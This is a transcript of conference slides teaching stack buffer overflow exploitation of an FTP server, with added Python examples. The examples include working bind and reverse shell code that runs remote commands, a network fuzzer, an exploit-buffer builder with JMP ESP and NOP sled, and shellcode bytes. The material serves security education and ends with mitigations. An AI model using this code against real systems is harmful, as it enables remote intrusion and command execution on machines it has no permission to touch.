Anatomy of a Buffer Overflow Attack

Slides from my talk at CodeStock 2012 describing the process of exploiting a buffer overflow vulnerability.

Transcript of "Anatomy of a Buffer Overflow Attack"

1. Anatomy of a Buffer Overflow Attack
   Rob Gillen (@argodev)
3. Don't Be Stupid
   The following presentation describes real attacks on real systems. Please note that most of the attacks described would be considered ILLEGAL if attempted on machines that you do not have explicit permission to test and attack. I assume no responsibility for any actions you perform based on the content of this presentation or subsequent conversations. Please remember this basic guideline: With knowledge comes responsibility.
4. Disclaimer
   The content of this presentation represents my personal views and thoughts at the present time. This content is not endorsed by, or representative in any way of, my employer, nor is it intended to be a view into my work or a reflection on the type of work that I or my group performs. It is simply a hobby and personal interest and should be considered as such.
5. Credits
   The vulnerability that we'll be discussing was initially discovered by C4SS!0 G0M3S (louredo_@hotmail.com) and was published on June 17, 2011.
   http://www.exploit-db.com/exploits/17539/
   James Fitts created a Metasploit module that I also reviewed while building this module.
   http://www.exploit-db.com/exploits/17540/
6. Example Overview
   • Scenario
     – Machine 1: BackTrack 5 SR1
     – Machine 2: Windows 7 Professional x64, SP1, fully patched, running Freefloat FTP Server v1.0
   • Tasks
     – Discover that a vulnerability exists
     – Craft & test an exploit
   • Goal: obtain a reverse shell
7. Attack Process
   • Identify target of interest
   • Identify software/versions being used
   • Set up a local instance
   • Fuzz to identify a vulnerability
   • Design/develop the exploit
   • Test
   • Package/weaponize
8. Terminology
   • CPU Registers
   • Assembler Debugger
   • Buffer Overflows
   • Fuzzing
   • Shellcode
   • Encoding
   • Bind Shell/Reverse Shell
9. CPU Registers (x86, 32-bit)
   (These are the 32-bit extended forms of the 8086's 16-bit AX, BX, CX, DX, SI, DI, BP and SP, introduced with the 80386; the original 8086 has no E-prefixed registers.)
   • EAX – Accumulator Register
   • EBX – Base Register
   • ECX – Counter Register
   • EDX – Data Register
   • ESI – Source Index
   • EDI – Destination Index
   • EBP – Base Pointer
   • ESP – Stack Pointer
   Content from: http://www.swansontec.com/sregisters.html
10. CPU Registers (x86, 32-bit)
   • EIP – program counter or, commonly, "instruction pointer": a processor register that indicates where a computer is in its program sequence.
   • Holds the memory address of ("points to") the next instruction that will be executed.
   • Any thoughts on why this specific register is particularly interesting? (Whoever controls EIP controls what the CPU executes next; overwriting it is the whole point of the overflow developed later in the deck.)
   Content from: http://en.wikipedia.org/wiki/Instruction_pointer
11. Assembler Debugger
12. Buffer Overflow
   • Software accepts input, but doesn't ensure that it is only as long as supported.
   • In this case, software accepts a value into the variable A, but the user sends an overly-long string ("excessive") that overflows the space allocated to A and overwrites the integer previously stored in B.
   [figure: the Wikipedia example, an 8-byte character buffer A adjacent to a 2-byte integer B; "excessive" plus its terminator is 10 bytes, so the last two bytes land in B]
   Content from: http://en.wikipedia.org/wiki/Buffer_overflow
13. Fuzzing
   • Identify points where the application or service accepts data
   • Send varying lengths/types of data until we crash the service and/or overwrite key buffers
   • Increase the buffer length until the crash no longer reproduces (this identifies the upper bound of the memory space available for the exploit)
14. Shellcode
   • Small piece of code used as the payload in the exploitation of a software vulnerability
   • Name comes from the purpose: it usually spawns a shell and performs some action
   • Often written in assembly code
   • Types: "normal", Staged, Egg-hunt, Omelette
   Content from: http://en.wikipedia.org/wiki/Shellcode
15. Shellcode Example

    [BITS 32]
    mov ebx, 0x00424F52
    push ebx
    mov esi, esp
    xor eax, eax
    push eax
    push esi
    push esi
    push eax
    mov eax, 0x7E45058A
    call eax

16. Shellcode Example (annotated)

    [BITS 32]
    mov ebx, 0x00424F52   ; load the null-terminated string "ROB" (bytes 52 4F 42 00, little-endian) into ebx
    push ebx              ; push it onto the stack
    mov esi, esp          ; esi now points at the "ROB\0" string on the stack
    xor eax, eax          ; zero eax (eax = 0)
    push eax              ; 4th parameter: uType = 0
    push esi              ; 3rd parameter: lpCaption = "ROB"
    push esi              ; 2nd parameter: lpText = "ROB"
    push eax              ; 1st parameter: hWnd = 0
    mov eax, 0x7E45058A   ; address of MessageBoxA (hard-coded; only valid for the user32.dll build it was taken from)
    call eax              ; MessageBoxA(0, "ROB", "ROB", 0)

17. Shellcode Example (assembled bytes)

    BB 52 4F 42 00 53 89 E6 31 C0 50 56 56 50 B8 8A 05 45 7E FF D0

    Note the 00 at offset 4: it is the string terminator embedded in the mov ebx immediate. A NULL inside the payload truncates a C-string copy, which is exactly the kind of restricted byte the encoding step on the next slide exists to remove.
18. Encoding
   • There are often restrictions on what data can be sent via the exploit (NULLs, and for a line-based protocol such as FTP the CR/LF line terminators, etc.)
   • Self-extracting (smaller shellcode)
   • Self-decrypting (avoid IDS signatures)
   • Tools such as msfencode offer many options
19. Encoded Shellcode

    "\xbe\x13\xaf\x49\x81\xda\xc7\xd9\x74\x24\xf4\x58\x31\xc9\xb1\x06"
    "\x83\xe8\xfc\x31\x70\x0f\x03\x70\x1c\x4d\xbc\x3a\x70\xde\x7d\x3d"
    "\x27\x69\x67\x0c\x07\x39\x3e\x39\xd7\x02\x34\xc0\x92\x0c\xb6\x1b"
20. Bind Shell / Reverse Shell
   • Bind Shell
     – Target exposes a shell on a given port
     – Attacker connects to that port and executes commands
     – The classic remote-administration model
   • Reverse Shell
     – Attacker listens for connections on a given port
     – Shellcode on the target connects to the attacker and sends a shell
     – NAT-safe: the target makes an outbound connection, so no inbound port on the target needs to be reachable

21. Bind Shell
   • Code executes on the target and exposes a listener on a specific port (e.g. 4444)
   • Attacker connects to target-ip:4444
   • Target hands a shell to the attacker over that connection

22. Reverse Shell
   • Attacker exposes a listener on a specific port (e.g. 4444)
   • Code executes on the target and connects out to attacker-ip:4444
   • Target sends a shell to the attacker over the outbound connection
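The two directions on slides 20 to 22, as an added Python example that is not part of the talk (real shellcode does the target half in a few dozen bytes of machine code; this is the same exchange written out readably). Both halves run over loopback so the demo is self-contained: the only difference between the variants is which side calls listen()/accept() and which side calls connect(). The commands executed ("echo ...") and the port selection are constructed for the demo.

```python
import socket
import subprocess
import threading
import time

# Added example, not from the slides: a minimal bind shell and reverse shell in Python,
# to make concrete which side listens and which side connects. Both halves run on
# loopback here; the "target" half is the job real shellcode does.


def serve_commands(conn, max_commands=1):
    """Target side, shared by both variants: read a command line, run it, send the output back."""
    with conn:
        for _ in range(max_commands):
            line = conn.recv(4096)
            if not line:
                break
            proc = subprocess.run(line.decode().strip(), shell=True, capture_output=True)
            conn.sendall(proc.stdout + proc.stderr)


def bind_shell_target(port, host="127.0.0.1", max_commands=1):
    """Bind shell: the TARGET listens on `port` and waits for the attacker to connect in."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((host, port))
    listener.listen(1)
    with listener:
        conn, _ = listener.accept()
    serve_commands(conn, max_commands)


def reverse_shell_target(attacker_host, attacker_port, max_commands=1):
    """Reverse shell: the TARGET connects out to the attacker's listener (an outbound
    connection, which is why it works from behind NAT)."""
    conn = socket.create_connection((attacker_host, attacker_port))
    serve_commands(conn, max_commands)


def run_command(conn, command, timeout=5.0):
    """Attacker side once a channel exists: send one command line, return its output."""
    conn.settimeout(timeout)
    conn.sendall(command.encode() + b"\n")
    return conn.recv(65536)


def _free_port():
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def demo_bind_shell(command="echo bind-shell-ok"):
    """Attacker connects TO the target's listener (slide 21)."""
    port = _free_port()
    t = threading.Thread(target=bind_shell_target, args=(port,), daemon=True)
    t.start()
    for _ in range(50):  # retry until the target's listener is up
        try:
            conn = socket.create_connection(("127.0.0.1", port), timeout=1.0)
            break
        except OSError:
            time.sleep(0.05)
    else:
        raise RuntimeError("bind shell never came up")
    with conn:
        out = run_command(conn, command)
    t.join(5)
    return out


def demo_reverse_shell(command="echo reverse-shell-ok"):
    """Attacker listens; the target calls back (slide 22)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    t = threading.Thread(target=reverse_shell_target, args=("127.0.0.1", port), daemon=True)
    t.start()
    with listener:
        conn, _ = listener.accept()
    with conn:
        out = run_command(conn, command)
    t.join(5)
    return out


if __name__ == "__main__":
    print(demo_bind_shell())
    print(demo_reverse_shell())
```

Each target function serves a single command and exits so the demo terminates; a real payload loops until the connection drops. The attacker-side code is identical in both cases once the socket exists, which is the point: the choice between bind and reverse is purely about who initiates the TCP connection.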
23. Fuzzing Pseudo-Code
   • Build an array of increasing-length strings ("A" * n)
   • Build an array of valid commands
   • For each command in arrayOfCommands
     – For each string in arrayOfStrings
       • Establish an FTP connection
       • Submit command + string
   • Watch for an application hang/crash
   • Inspect register values/pointers
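The pseudo-code above as a runnable Python fuzzer, added here and not the talk's own script. The loop structure is exactly the slide's (every command, every length, a fresh connection per probe); `ftp_send` is a real socket transport for a lab instance, while `FakeFtpTransport` is a constructed stand-in that "crashes" once a chosen command receives a chosen length, so the example runs offline. The list of FTP verbs, the length steps and the fake's crash point are all constructed values; register inspection after the crash still happens in the debugger, so the fuzzer's job ends at reporting which probe killed the service.

```python
import socket

# Added example (not from the slides). FTP verbs to probe: constructed list.
FTP_COMMANDS = ["USER", "PASS", "CWD", "MKD", "RETR"]


def buffer_lengths(start=100, stop=2000, step=100):
    """The array of increasing lengths from the slide: 100, 200, ..., 2000 bytes."""
    return list(range(start, stop + 1, step))


def ftp_send(host, port, command, payload, timeout=3.0):
    """Real transport: open a new FTP control connection, send one command with the
    payload as its argument, and report whether the service still answered."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.recv(1024)                                   # 220 banner
            s.sendall(command.encode() + b" " + payload + b"\r\n")
            return bool(s.recv(1024))                      # any reply = still alive
    except OSError:                                        # refused, reset, timeout
        return False


def fuzz(send, commands=FTP_COMMANDS, lengths=None):
    """For each command, for each length, submit command + "A"*length.
    Returns (command, length) of the first probe the service failed to answer, or
    None if nothing crashed. Stops at the first crash: once the service is down every
    later probe would also fail, and a crashed service needs a restart before the
    next command is worth testing."""
    lengths = lengths or buffer_lengths()
    for command in commands:
        for n in lengths:
            if not send(command, b"A" * n):
                return command, n
    return None


class FakeFtpTransport:
    """Constructed stand-in for the target: answers every probe until `crash_command`
    arrives with at least `crash_at` bytes, then stays dead (like a crashed service)."""

    def __init__(self, crash_command="USER", crash_at=230):
        self.crash_command = crash_command
        self.crash_at = crash_at
        self.alive = True
        self.log = []                                      # (command, length) of every probe

    def __call__(self, command, payload):
        self.log.append((command, len(payload)))
        if not self.alive:
            return False
        if command == self.crash_command and len(payload) >= self.crash_at:
            self.alive = False
            return False
        return True


if __name__ == "__main__":
    target = FakeFtpTransport()
    print("crashed on:", fuzz(target))                    # ('USER', 300) with the default 100-byte steps
    # against a lab box: fuzz(lambda cmd, data: ftp_send("192.0.2.10", 21, cmd, data))
```

With 100-byte steps the fake crashes on the 300-byte USER probe although it dies at 230 bytes; rerunning with a finer step (for example 10 bytes) narrows the length, and the Design The Exploit slides then take over to find the exact EIP offset.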
24. Demonstration: FUZZING THE SERVICE
25. Design The Exploit
   • Iterate with various malicious buffer sizes to see how much space is available
   • Locate where within the evil buffer we actually overwrite EIP
   • Locate where within the evil buffer we can place our shellcode (pointed to by another register, e.g. ESP)

26. Design The Exploit
   • Select / configure / encode shellcode
   • Integrate into the exploit script (NOP slide, breakpoints, etc.)
   • Identify a reusable jump address (an instruction in a loaded module that jumps through the register pointing at our buffer) to consistently move to the shellcode
   • Test with breakpoints
   • Test in a "real world" scenario
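The three mechanical steps of slides 25 and 26, as an added Python example that is not the talk's exploit script: a Metasploit-style cyclic pattern to turn the EIP value seen in the debugger into a buffer offset, a bad-character probe so the encoding step knows what to avoid, and assembly of the final buffer (filler, return address, NOP sled, shellcode, padding). The offset of 230, the JMP ESP address 0x7C9D30D7 and the INT3 placeholder shellcode in `demo()` are constructed values for illustration; the layout assumes the classic case where ESP points just past the overwritten return address when the vulnerable function returns, so a JMP ESP lands in the NOP sled.

```python
import itertools
import string
import struct

# Added example (not from the slides). Values used in demo() are constructed.


def pattern_create(length):
    """Cyclic pattern Aa0Aa1Aa2...Zz9 (same scheme as Metasploit's pattern_create).
    Every 4-byte window is unique, so the dword that lands in EIP identifies exactly
    which part of the buffer overwrote it."""
    pattern = bytearray()
    for u, l, d in itertools.product(string.ascii_uppercase, string.ascii_lowercase, string.digits):
        pattern += (u + l + d).encode()
        if len(pattern) >= length:
            return bytes(pattern[:length])
    raise ValueError("pattern longer than 20280 bytes is no longer unique")


def pattern_offset(eip_value, length):
    """Given EIP as read in the debugger (e.g. 0x37684136), return the offset into a
    `length`-byte pattern that overwrote it, or -1. x86 is little-endian, so the
    register value is packed back into memory order before searching."""
    return pattern_create(length).find(struct.pack("<I", eip_value))


def badchar_probe(known_bad=b"\x00"):
    """Every byte value except the ones already known to break the protocol. Sent in
    place of the shellcode; whatever is missing or altered in memory is a bad char."""
    return bytes(b for b in range(256) if b not in known_bad)


def check_bad_chars(blob, bad_chars):
    """Bytes in `blob` that collide with the bad-character list (empty list = safe)."""
    return sorted(set(blob) & set(bad_chars))


def build_exploit(offset, ret_addr, shellcode, nop_sled=16, total_len=None,
                  bad_chars=b"\x00\x0a\x0d"):
    """Layout: [offset bytes of filler][return address][NOP sled][shellcode][padding].
    ret_addr is a reusable JMP ESP in a loaded module; assumes ESP points just past
    the overwritten return address, so the jump lands in the sled."""
    ret = struct.pack("<I", ret_addr)
    for name, blob in (("return address", ret), ("shellcode", shellcode)):
        bad = check_bad_chars(blob, bad_chars)
        if bad:
            raise ValueError(f"{name} contains bad characters: {[hex(b) for b in bad]}")
    buf = b"A" * offset + ret + b"\x90" * nop_sled + shellcode
    if total_len is not None:
        if len(buf) > total_len:
            raise ValueError(f"payload needs {len(buf)} bytes, only {total_len} available")
        buf += b"C" * (total_len - len(buf))   # pad to the size the fuzzer showed was safe
    return buf


def demo():
    """Walk the steps with constructed values; returns (offset, EIP seen, final buffer)."""
    length = 1000
    # 1. crash the service with the pattern and read EIP in the debugger
    #    (here the value is simply read back out of the pattern at offset 230)
    eip_seen = struct.unpack("<I", pattern_create(length)[230:234])[0]
    offset = pattern_offset(eip_seen, length)
    # 2. a hypothetical JMP ESP in a non-rebased module (constructed address)
    jmp_esp = 0x7C9D30D7
    # 3. placeholder shellcode: INT3 breakpoints, so the debugger stops if the jump works
    buf = build_exploit(offset, jmp_esp, b"\xcc" * 4, total_len=length)
    return offset, hex(eip_seen), buf


if __name__ == "__main__":
    off, eip, buf = demo()
    print(f"EIP {eip} -> offset {off}; buffer {len(buf)} bytes")
```

Once the INT3 sled is hit under the debugger, the placeholder is swapped for the real (encoded) payload with the same `build_exploit` call; the bad-character check then rejects any encoded shellcode or return address that contains a byte the protocol would mangle, which is the failure that otherwise shows up as a crash at a seemingly random address.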
27. Demonstration: DESIGNING THE EXPLOIT
28. Solutions?
   • Bounds checking is critical! Never copy input into a fixed-size buffer without checking its length against the size of that buffer.
   • Fuzz your own applications
   • Address Space Layout Randomization (ASLR): randomizes where modules are loaded, so a hard-coded jump or function address (like the MessageBoxA address in the shellcode above) no longer points where the exploit expects
   • Operating System Support – Data Execution Prevention (DEP): marks the stack and heap non-executable, so shellcode placed in the overflowed buffer cannot run directly
   ASLR and DEP mitigate rather than fix: they raise the cost of exploitation but do not remove the overflow, and on Windows they protect a process only when its binary opts in or system policy forces them on.
29. Questions/Contact
   Rob Gillen
   rob@gillenfamily.net
   http://rob.gillenfamily.net
   @argodev
